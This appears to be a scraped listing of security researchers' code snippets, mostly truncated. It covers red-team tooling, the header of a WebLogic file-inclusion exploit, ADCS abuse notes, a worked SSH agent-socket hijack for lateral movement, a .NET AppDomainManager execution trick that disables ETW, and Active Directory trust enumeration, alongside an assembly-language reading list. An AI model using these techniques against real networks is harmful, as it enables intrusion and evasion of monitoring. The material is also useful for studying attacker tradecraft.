z0rs

Red Teaming tool

• General usefull Powershell Scripts
• AMSI Bypass restriction Bypass
• Payload Hosting
• Network Share Scanner
• Lateral Movement
• Reverse Shellz
• POST Exploitation

picar0jsu

# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019, WebLogic 12.2.1.3.0, Peoplesoft 8.57.22
# CVE : CVE-2022-21371

# Description

Flangvik

PKI Abuse

Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity

Enumerating ADCS On Linux

Download and install Certi

int0x80

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

byt3bl33d3r

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
3. Host test.dll on a remote SMB or HTTP(S) server

ropnop

package main

/*
Example Go program with multiple .NET Binaries embedded

This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

Place all your EXEs are in a "binaries" folder

w00tc

Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts 

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


Grab Forest Trusts.

([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

alexander-hanel

Computer Architecture

• Crash Course Computer Science
  • Start here.

Assembly Language

Check out the first two books but download the Intel Software Manuals and use as references.

• Assembly Language Step by Step
  • Easy introduction to Assembly Language
• Assembly Language for X86 Processors by Kip Irvine

rasta-mouse

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {

hfiref0x

typedef interface IEditionUpgradeManager IEditionUpgradeManager;

typedef struct IEditionUpgradeManagerVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in IEditionUpgradeManager * This,
        __RPC__in REFIID riid,